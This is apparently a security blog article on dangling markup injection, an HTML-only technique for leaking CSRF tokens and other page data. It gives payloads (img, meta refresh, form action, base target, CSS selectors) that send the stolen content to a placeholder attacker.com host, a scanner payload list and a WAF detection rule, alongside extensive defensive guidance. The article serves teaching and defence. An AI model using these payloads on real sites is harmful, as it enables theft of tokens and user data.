Security
17 min read
87 views

Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

IT
InstaTunnel Team
Published by our engineering team
Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

Understanding the Silent Data Exfiltration Technique That Bypasses Modern Web Security

In the ever-evolving landscape of web application security, attackers continuously discover innovative techniques to circumvent defensive measures. While Content Security Policy (CSP) and input filters have become increasingly effective at preventing traditional Cross-Site Scripting (XSS) attacks, a sophisticated exploitation method called Dangling Markup Injection offers attackers an alternative path to exfiltrate sensitive data without executing JavaScript code. This technique leverages fundamental browser behavior and HTML parsing mechanisms to capture confidential information, including CSRF tokens, session identifiers, and personal data.

What is Dangling Markup Injection?

Dangling markup injection is a technique for capturing data cross-domain in situations where a full cross-site scripting attack isn’t possible. Unlike conventional XSS attacks that require script execution, dangling markup exploits the way browsers parse incomplete HTML tags and attributes.

The attack exploits an unclosed tag or attribute to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it. The fundamental principle relies on the browser’s lenient parsing behavior: when encountering an unclosed attribute or tag, browsers continue reading subsequent content until they find the appropriate closing delimiter.

The Core Mechanism

The attack works by injecting HTML that contains an opening tag with an incomplete attribute. When a browser parses the response, it will look ahead until it encounters a single quotation mark to terminate the attribute, and everything up until that character will be treated as being part of the URL and will be sent to the attacker’s server within the URL query string.

Consider a vulnerable web application that embeds user-controllable data into its HTML response without proper sanitization:

<input type="text" name="search" value="USER_INPUT_HERE">

If the application fails to escape characters like > or ", an attacker can inject a malicious payload that breaks out of the existing context and introduces a new HTML element with an unclosed attribute.

How Dangling Markup Injection Works

Basic Attack Vector

The most straightforward implementation of this technique involves injecting an image tag with an unclosed src attribute. Here’s how the attack unfolds:

Original vulnerable HTML:

<input type="text" name="email" value="USER_CONTROLLED_INPUT">
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Attacker’s payload:

"><img src='https://attacker.com/collect?data=

Resulting HTML after injection:

<input type="text" name="email" value=""><img src='https://attacker.com/collect?data=
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

The consequence of the attack is that the attacker can capture part of the application’s response following the injection point, which might contain sensitive data such as CSRF tokens, email messages, or financial data.

When the browser renders this page, it interprets everything between the injected src='https://attacker.com/collect?data= and the next single quote (in this case, after the CSRF token value) as part of the image URL. The browser then automatically makes a GET request to:

https://attacker.com/collect?data=<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Any non-alphanumeric characters, including newlines, will be URL-encoded, allowing the attacker to capture the complete content between the injection point and the closing delimiter.

Alternative Exploitation Techniques

While image tags are the most common vector, attackers can exploit various HTML elements that make external requests:

1. Meta Refresh Tags

"><meta http-equiv="refresh" content="0;url=https://attacker.com/exfil?

This payload redirects the page while capturing subsequent content in the URL parameters.

2. Form Action Manipulation

Attackers can inject incomplete form tags to redirect form submissions:

"><form action='https://attacker.com/capture?

Any form data submitted on the page will be sent to the attacker’s server along with the captured markup.

3. Base Tag Exploitation

Using the target attribute on the base tag, attackers can change the window name of every link on the page. By injecting an incomplete target attribute, the window name will be set with all the markup after the injection until the corresponding quote on every link on the page.

<a href="https://attacker.com/payload.html"><font size=100 color=red>Click here</font></a>
<base target='

When a user clicks any link on the page, the window.name property will contain all HTML content up to the next single quote, which can then be exfiltrated cross-domain since window.name is accessible across origins.

4. CSS-Based Exfiltration

CSS supports importing external CSS files using the @import rule, which can be abused along with CSS query selectors to exfiltrate arbitrary HTML content on the page.

<style>
input[name=csrf_token][value^=a]{
  background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf_token][value^=b]{
  background-image: url(https://attacker.com/exfil/b);
}
</style>

The regex-based query selector in CSS tries to find if there are any input tag with value started with the letter a and if such a tag exists, the arbitrary URL is loaded as the background image. This technique enables character-by-character extraction of sensitive tokens.

Why Dangling Markup is Particularly Dangerous

Bypasses Traditional XSS Defenses

Dangling markup works even with strict CSP in place, doesn’t require JavaScript execution, and can steal CSRF tokens, session identifiers, and other sensitive data.

Modern web applications typically implement multiple layers of defense:

  1. Input validation and filtering - Blocks <script> tags and JavaScript event handlers
  2. Content Security Policy (CSP) - Prevents execution of inline scripts and restricts resource loading
  3. XSS Auditor / XSS Filter - Browser-based detection of malicious scripts
  4. Output encoding - Escapes dangerous characters in user input

Dangling markup injection circumvents these protections because:

  • No JavaScript execution required - The attack relies purely on HTML structure and browser behavior
  • Legitimate HTML elements - Uses standard tags like <img>, <meta>, and <form> that applications often allow
  • Subtle syntax - The attack doesn’t introduce obviously malicious patterns that filters typically detect
  • Browser-native behavior - Exploits fundamental HTML parsing rules rather than security vulnerabilities

Real-World Impact Scenarios

CSRF Token Theft

The most critical application of dangling markup injection involves stealing CSRF tokens. Once an attacker obtains a valid CSRF token associated with a user’s session, they can:

  • Perform unauthorized state-changing operations
  • Modify user account settings
  • Initiate financial transactions
  • Change passwords or email addresses
  • Delete user data

Sensitive Information Leakage

Beyond CSRF tokens, attackers can exfiltrate:

  • Personal Identifiable Information (PII) - Names, addresses, phone numbers
  • Financial data - Credit card details, bank account information
  • Session identifiers - Enabling session hijacking attacks
  • Email content - Messages displayed on the page
  • Private messages - Chat conversations, notifications
  • API keys and secrets - Exposed in hidden form fields or JavaScript variables

Reconnaissance and Profiling

Even when immediate exploitation isn’t possible, captured data provides valuable intelligence:

  • Application structure and hidden functionality
  • Internal parameter names and formats
  • CSRF token generation patterns
  • User behavior and interaction patterns

Browser Behavior and Parsing Quirks

How Browsers Handle Unclosed Attributes

Modern browsers implement lenient HTML parsing based on the HTML5 specification. This permissive approach prioritizes user experience over strict syntax enforcement. When encountering an unclosed attribute:

  1. The browser enters an attribute value context
  2. It continues consuming characters until finding a matching quote
  3. Subsequent opening quotes are treated as literal characters
  4. The attribute remains open across multiple lines and nested elements
  5. Only the matching closing quote or end-of-document terminates the attribute

This behavior, designed to handle malformed HTML gracefully, creates the exact vulnerability that dangling markup exploits.

URL Encoding and Data Transmission

Any non-alphanumeric characters, including newlines, will be URL-encoded during transmission. This means attackers receive the captured data in a structured format:

https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%22token123%22%3E

Decoding this URL reveals the original HTML structure, allowing attackers to extract specific values programmatically.

Chrome’s Mitigation Attempts

The Chrome browser has decided to tackle dangling markup attacks by preventing tags like img from defining URLs containing raw characters such as angle brackets and newlines.

This browser-level mitigation blocks many basic dangling markup payloads but doesn’t eliminate the attack surface entirely. Attackers can:

  • Use alternative HTML elements not subject to URL restrictions
  • Exploit protocol schemes other than HTTP (e.g., FTP)
  • Employ DOM-based techniques that don’t rely on URL parameters
  • Leverage user interaction-based vectors

Bypassing Content Security Policy (CSP)

While CSP effectively prevents many XSS attacks, dangling markup injection presents unique challenges for CSP-based defenses.

CSP Limitations Against Dangling Markup

It’s quite common for a CSP to block resources like script. However, many CSPs do allow image requests, meaning you can often use img elements to make requests to external servers to disclose CSRF tokens.

A typical CSP might include:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

This policy blocks external scripts but doesn’t prevent image loading, leaving the application vulnerable to basic dangling markup attacks.

CSP Directives for Mitigation

Note that these policies will prevent some dangling markup exploits, because an easy way to capture data with no user interaction is using an img tag. However, it will not prevent other exploits, such as those that inject an anchor tag with a dangling href attribute.

More restrictive policies might include:

Content-Security-Policy: default-src 'none'; img-src 'self'; base-uri 'none'

However, even strict CSPs can be bypassed through:

DOM-Based Dangling Markup Techniques

Even from the most CSP restricted environments you can still exfiltrate data with some user interaction using the base target attribute.

Example exploitation with restrictive CSP:

<a href="http://attacker.com/payload.html">
  <font size=100 color=red>You must click me</font>
</a>
<base target='

The target attribute inside the base tag will contain HTML content until the next single quote, making the value of window.name if the link is clicked all that HTML content, which can then be accessed cross-domain.

Iframe Name Exploitation

Attackers can abuse iframe name attributes to bypass CSP restrictions:

<iframe src="vulnerable-page.php?input="><iframe name='" onload="exfiltrate(this.contentWindow)">
</iframe>

The inner iframe’s name attribute captures subsequent page content, which JavaScript in the outer iframe can access and transmit to attacker-controlled servers.

Advanced Exploitation Techniques

Automated Token Extraction

Sophisticated attackers deploy automated systems to extract specific values from captured markup. CSS regex selectors can be used to exfiltrate CSRF tokens character-by-character by injecting multiple selectors that trigger requests based on token prefix matches.

<style>
input[name=csrftoken][value^=a]{ background-image: url(https://attacker.com/exfil/a); }
input[name=csrftoken][value^=b]{ background-image: url(https://attacker.com/exfil/b); }
/* ... continued for all characters ... */
input[name=csrftoken][value^=a0]{ background-image: url(https://attacker.com/exfil/a0); }
input[name=csrftoken][value^=a1]{ background-image: url(https://attacker.com/exfil/a1); }
</style>

Based on which URLs receive requests, attackers reconstruct the complete token value. Tools like cssrf automate this entire process.

Multi-Stage Attacks

Dangling markup often serves as the initial phase in complex attack chains:

  1. Reconnaissance - Extract page structure and identify sensitive fields
  2. Token capture - Steal CSRF tokens using dangling markup
  3. Session hijacking - Use captured session identifiers
  4. Privilege escalation - Perform administrative actions with stolen credentials
  5. Data exfiltration - Access sensitive information using elevated privileges

Persistent Attacks

By injecting payloads into stored data (comments, profiles, messages), attackers create persistent dangling markup attacks that affect every user viewing the compromised content. This transforms a single vulnerability into a wide-scale data harvesting operation.

Real-World Vulnerabilities and Case Studies

Social Media Platforms

Social media applications frequently allow limited HTML in user-generated content (comments, posts, bios). Insufficient sanitization has led to dangling markup vulnerabilities where attackers:

  • Captured authentication tokens from victim profiles
  • Exfiltrated private message previews
  • Harvested user session data
  • Built detailed user behavior profiles

E-commerce Websites

Online shopping platforms have been exploited through dangling markup in:

  • Product review sections
  • Customer support ticket systems
  • Wishlist and shopping cart features
  • Payment form validation messages

Captured data included credit card information, billing addresses, and order history.

Email Web Clients

Webmail services represent prime targets because:

  • Emails contain highly sensitive information
  • HTML rendering is necessary for formatted messages
  • Users expect rich content from legitimate senders
  • Multiple email accounts may be accessed from single sessions

Dangling markup in email content has enabled attackers to:

  • Steal inbox content
  • Capture email addresses and contact lists
  • Harvest authentication codes sent via email
  • Monitor correspondence in real-time

Comprehensive Prevention and Mitigation Strategies

Input Validation and Sanitization

You can prevent dangling markup attacks using the same general defenses for preventing cross-site scripting, by encoding data on output and validating input on arrival.

Strict Input Validation

Implement whitelisting-based validation that only allows explicitly permitted characters and patterns:

import re

def validate_user_input(input_string):
    # Only allow alphanumeric characters, spaces, and basic punctuation
    allowed_pattern = re.compile(r'^[a-zA-Z0-9\s.,!?-]+$')
    
    if not allowed_pattern.match(input_string):
        raise ValueError("Invalid characters detected")
    
    # Additional length restrictions
    if len(input_string) > 200:
        raise ValueError("Input too long")
    
    return input_string

Context-Aware Output Encoding

Apply appropriate encoding based on where data will be rendered:

import html

def safe_html_render(user_data):
    # HTML entity encoding for display in HTML context
    return html.escape(user_data, quote=True)

The quote=True parameter ensures both single and double quotes are escaped, preventing breakout from attribute contexts.

Content Security Policy Configuration

Prevention methods include strict HTML attribute encoding, CSP connect-src restrictions, and input validation that detects incomplete tags.

Restrictive CSP Headers

Implement a defense-in-depth CSP that limits multiple attack vectors:

Content-Security-Policy:
  default-src 'none';
  script-src 'self' 'nonce-{random}';
  style-src 'self';
  img-src 'self';
  font-src 'self';
  connect-src 'self';
  frame-src 'none';
  base-uri 'none';
  form-action 'self';
  frame-ancestors 'none';

Key directives for dangling markup prevention:

  • img-src 'self' - Prevents external image loading
  • base-uri 'none' - Blocks base tag injection
  • form-action 'self' - Restricts form submission destinations
  • connect-src 'self' - Limits AJAX and WebSocket connections

CSP Reporting

Enable CSP violation reporting to detect attempted attacks:

Content-Security-Policy: default-src 'self'; report-uri /csp-violation-report

Monitor and analyze reports to identify attack patterns and vulnerable endpoints.

Server-Side Protections

Response Header Security

Implement additional security headers:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=(), camera=()

DOM Sanitization Libraries

Use battle-tested sanitization libraries that understand HTML parsing intricacies:

JavaScript (client-side):

import DOMPurify from 'dompurify';

function sanitizeHTML(dirty) {
    return DOMPurify.sanitize(dirty, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
        ALLOWED_ATTR: [],
        KEEP_CONTENT: true
    });
}

Python (server-side):

from bleach import clean

def sanitize_html(user_input):
    allowed_tags = ['b', 'i', 'em', 'strong', 'p']
    allowed_attrs = {}
    
    return clean(
        user_input,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )

Application Architecture Considerations

Separation of Contexts

Strictly separate different security contexts:

  • Never mix user-controlled data with sensitive information in the same HTML structure
  • Use separate pages or AJAX endpoints for operations involving CSRF tokens
  • Implement token delivery through HTTP headers rather than HTML body

Token Protection Strategies

CSRF tokens should be generated on the server-side and they should be generated only once per user session or each request. Per-request tokens are more secure than per-session tokens because the time range for an attacker to exploit stolen tokens is minimal.

Best practices for CSRF token management:

  1. Server-side generation only - Never generate tokens in JavaScript
  2. Strong randomness - Use cryptographically secure random number generators
  3. Session binding - Tie tokens to specific user sessions
  4. Short expiration - Implement time-based token invalidation
  5. HTTP-only cookies - Prevent JavaScript access to session cookies
  6. SameSite cookie attribute - Restrict cross-origin cookie transmission

Double-Submit Cookie Pattern

The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user’s authenticated session. Always bind the CSRF token explicitly to session-specific data and use Hash-based Message Authentication (HMAC) with a server-side secret key.

Implementation example:

import hmac
import hashlib
import secrets

def generate_csrf_token(session_id, secret_key):
    # Generate random token
    random_token = secrets.token_urlsafe(32)
    
    # Create HMAC signature binding token to session
    signature = hmac.new(
        secret_key.encode(),
        f"{session_id}:{random_token}".encode(),
        hashlib.sha256
    ).hexdigest()
    
    # Combine token and signature
    return f"{random_token}.{signature}"

def validate_csrf_token(token, session_id, secret_key):
    try:
        random_token, signature = token.split('.')
        
        expected_signature = hmac.new(
            secret_key.encode(),
            f"{session_id}:{random_token}".encode(),
            hashlib.sha256
        ).hexdigest()
        
        return hmac.compare_digest(signature, expected_signature)
    except:
        return False

Detection and Monitoring

WAF Rules

Configure Web Application Firewall (WAF) rules to detect dangling markup patterns:

# ModSecurity rule example
SecRule REQUEST_BODY "@rx <(?:img|iframe|form|base|meta|link)[^>]*(?:src|href|action|target)\s*=\s*['\"][^'\"]*$" \
    "id:100001,\
    phase:2,\
    deny,\
    log,\
    msg:'Potential dangling markup injection detected'"

Anomaly Detection

Monitor application logs for suspicious patterns:

  • Unusually long URL parameters
  • Multiple requests with HTML entity encoding
  • Patterns matching unclosed HTML attributes
  • Requests originating from unexpected external domains

User Behavior Analytics

Track unusual activities that might indicate exploitation:

  • Multiple failed form submissions
  • Rapid sequential requests to different endpoints
  • Unexpected external resource loading attempts
  • Changes in user agent or referrer patterns

Testing for Dangling Markup Vulnerabilities

Manual Testing Methodology

  1. Identify injection points - Test all user input fields, URL parameters, HTTP headers
  2. Test character filtering - Verify which characters are blocked: < > " ' /
  3. Inject basic payloads - Try simple incomplete tags: "><img src='http://attacker.com?
  4. Examine source code - Review rendered HTML to confirm injection
  5. Verify data exfiltration - Monitor attacker-controlled server for incoming requests
  6. Test CSP effectiveness - Attempt bypasses using alternative elements

Automated Scanning

Use specialized tools and scripts:

import requests

def test_dangling_markup(url, parameter):
    payloads = [
        '"><img src="http://attacker.com?',
        "'><img src='http://attacker.com?",
        '"><iframe src="http://attacker.com?',
        '"><meta http-equiv="refresh" content="0;url=http://attacker.com?',
        '"><base target="',
    ]
    
    results = []
    for payload in payloads:
        test_data = {parameter: payload}
        response = requests.post(url, data=test_data)
        
        # Check if payload appears unencoded in response
        if payload in response.text:
            results.append({
                'payload': payload,
                'vulnerable': True,
                'context': extract_context(response.text, payload)
            })
    
    return results

Penetration Testing Checklist

  • [ ] Test all input fields for HTML injection
  • [ ] Verify quote character filtering
  • [ ] Check for angle bracket restrictions
  • [ ] Test attribute-based injections
  • [ ] Attempt CSP bypasses
  • [ ] Verify CSRF token exposure
  • [ ] Test stored vs reflected injection
  • [ ] Evaluate user interaction requirements
  • [ ] Check browser-specific behaviors
  • [ ] Test mobile application endpoints
  • [ ] Verify API endpoint security

Developer Security Guidelines

Secure Coding Practices

  1. Assume all input is malicious - Treat user data as untrusted by default
  2. Use framework protections - Leverage built-in security features of modern frameworks
  3. Apply defense in depth - Implement multiple overlapping security layers
  4. Regular security training - Keep development teams updated on emerging threats
  5. Code review focus - Specifically review HTML rendering logic and user input handling

Framework-Specific Recommendations

React

// Automatic escaping by default
function SafeComponent({ userInput }) {
    return <div>{userInput}</div>;  // Safe - React escapes by default
}

// Dangerous - explicitly disabled escaping
function UnsafeComponent({ userInput }) {
    return <div dangerouslySetInnerHTML={{__html: userInput}} />;  // Vulnerable
}

Angular

// Use built-in sanitization
import { DomSanitizer } from '@angular/platform-browser';

constructor(private sanitizer: DomSanitizer) {}

getSafeHtml(userInput: string) {
    return this.sanitizer.sanitize(SecurityContext.HTML, userInput);
}

Django

# Template auto-escaping (enabled by default)
{{ user_input }}  # Safe - automatically escaped

# Explicitly disable escaping (dangerous)
{{ user_input|safe }}  # Vulnerable

Security Review Checklist

Before deploying code that handles user input:

  • [ ] All user input is validated against a whitelist
  • [ ] Output encoding is applied contextually
  • [ ] CSP headers are properly configured
  • [ ] CSRF tokens are securely implemented
  • [ ] No direct HTML concatenation with user data
  • [ ] Sanitization libraries are up to date
  • [ ] Security tests include dangling markup scenarios
  • [ ] Monitoring and logging are properly configured

Conclusion

Cross-Site Scripting (XSS) can defeat all CSRF mitigation techniques, making CSRF tokens essential for web applications that rely on cookies for authentication. However, dangling markup injection demonstrates that the attack surface extends beyond traditional XSS to include subtle HTML parsing behaviors.

This sophisticated technique highlights the importance of comprehensive security approaches that go beyond blocking obvious attack vectors. One can reduce the chances of getting hit by a dangling markup attack by checking web applications for vulnerability to code injection including HTML tags, checking and sanitizing user input data, introducing content security policies, and using browsers with protection against dangling markup.

Key Takeaways

  1. Dangling markup doesn’t require JavaScript - Making it effective against strict CSP and XSS filters
  2. Multiple exploitation vectors exist - Images, forms, base tags, meta redirects, and CSS all provide attack surfaces
  3. Browser behavior enables attacks - Lenient HTML parsing creates the vulnerability
  4. Defense requires multiple layers - No single mitigation completely eliminates the risk
  5. CSRF tokens remain valuable - Despite potential exposure through dangling markup, they’re still essential
  6. Continuous monitoring is crucial - Detection and response capabilities are as important as prevention

Future Considerations

As web applications evolve, new dangling markup vectors will likely emerge. Browser vendors continue implementing mitigations, but the fundamental HTML parsing behavior that enables these attacks remains necessary for backward compatibility. Security professionals must stay informed about emerging techniques and continually reassess application security postures.

The relationship between usability and security creates inherent tension - allowing rich HTML content improves user experience but expands attack surfaces. Organizations must carefully evaluate their risk tolerance and implement security controls proportional to the sensitivity of protected data.

By understanding dangling markup injection deeply, implementing comprehensive defenses, and maintaining vigilant monitoring, organizations can significantly reduce their exposure to this subtle but dangerous attack vector while preserving the functionality users expect from modern web applications.

Related Topics

#dangling markup injection, dangling markup, CSRF token theft, no-JS exfiltration, HTML parsing attack, attribute injection, unclosed attribute attack, image src exfiltration, meta refresh exfiltration, base tag exfiltration, iframe name exfiltration, window.name exfiltration, CSS exfiltration, cssrf, css-based exfiltration, form action exfiltration, leaking hidden fields, CSRF token leakage, HTML5 parsing quirks, browser parsing attack, CSP bypass dangling markup, CSP bypass, no-script data exfiltration, cross-site data leakage, stored dangling markup, reflected dangling markup, persistent dangling markup, content sanitization bypass, input sanitization failure, output encoding required, DOM parsing quirks, img-src data leak, meta-refresh attack, form-action manipulation, base-uri exploit, origin-crossing windowname, iframe attribute abuse, exfiltration without script, stealing session tokens, stealing session ids, stealing cookies without JS, detect dangling markup, modsecurity dangling markup rules, WAF rules dangling markup, mitigation dangling markup, sanitize attributes, encode quotes and angle brackets, validate input attributes, CSP img-src restrict, form-action self only, token delivery best practices, double-submit cookie protection, sameSite cookie CSRF defense, test dangling markup, automated dangling markup scanner, pentesting dangling markup, browser mitigations dangling markup

Share this article

More InstaTunnel Insights

Discover more tutorials, tips, and updates to help you build better with localhost tunneling.

Browse All Articles